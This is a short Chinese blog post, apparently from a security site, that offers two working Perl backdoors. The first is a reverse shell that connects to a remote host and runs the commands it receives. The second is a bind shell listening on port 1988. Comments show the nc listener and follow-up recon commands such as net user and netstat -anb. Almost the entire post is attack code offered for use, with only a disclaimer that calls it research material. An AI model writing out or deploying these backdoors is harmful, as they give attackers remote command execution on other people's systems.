作者:小杰
都是使用nc监听!
反向连接代码:
#!/usr/bin/perl #usage: #nc -vv -l -p PORT(default 1988) on your local system first,then #Perl $0 Remote IP(default 127.0.0.1) Remote_port(default 1988) #Type 'exit' to exit or press Enter to gain shell when u under the 'console'. #nc -vv -l -p 1988 #perl backdoor.pl 127.0.0.1 1988 #use strict; use Socket; use IO::Socket; use Cwd; use IO::Handle; my $remote = $ARGV[0]|| "127.0.0.1"; my $remote_port = $ARGV[1]|| 1988; my $pack_addr = sockaddr_in( $remote_port, inet_aton($remote)); my $path = cwd(); $ARGC = @ARGV; if ($ARGV[0]!~/-/) { socket(SOCKET, PF_INET, SOCK_STREAM,getprotobyname('tcp')) or die "socket error: "; STDOUT->autoflush(1); SOCKET->autoflush(1); $conn=connect(SOCKET,$pack_addr)||die "connection error : $!"; open STDIN,">&SOCKET"; open STDOUT,">&SOCKET"; open STDERR,">&SOCKET"; print "You are in $path/n"; print "Welcome to use./n"; print "console>/n"; while (<STDIN>) { chomp; if( lc($_) eq 'exit' ) { print " Bye Bye!"; exit; } $msg=system($_); if($msg){ print STDOUT "/n$msg/n"; print STDOUT "console>"; }else { print "console>"; } } close SOCKET; exit; }
正向连接代码:
#!/usr/bin/perl #ActivePerl 5.8.8 Build 822 #usage: #first:perl backdoor2c.pl #second:nc -vv 127.0.0.1 1988 #net user #ipconfig /all #netstat -anb use IO::Socket; $port = "1988"; my $socket = new IO::Socket::INET ( 'Localhost'=>'127.0.0.1' , 'LocalPort'=>$port , 'Listen'=>1 , 'Proto'=>'tcp' , 'Reuse'=>1 ); die "Reason: $!" unless $socket; while (my $new_socket = $socket->accept()) { while (my $buffer=<$new_socket> ){ if ($buffer=~/exit/) {exit;} $res_msg=`$buffer`; print $new_socket "$res_msg/ncmd>"; }}
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论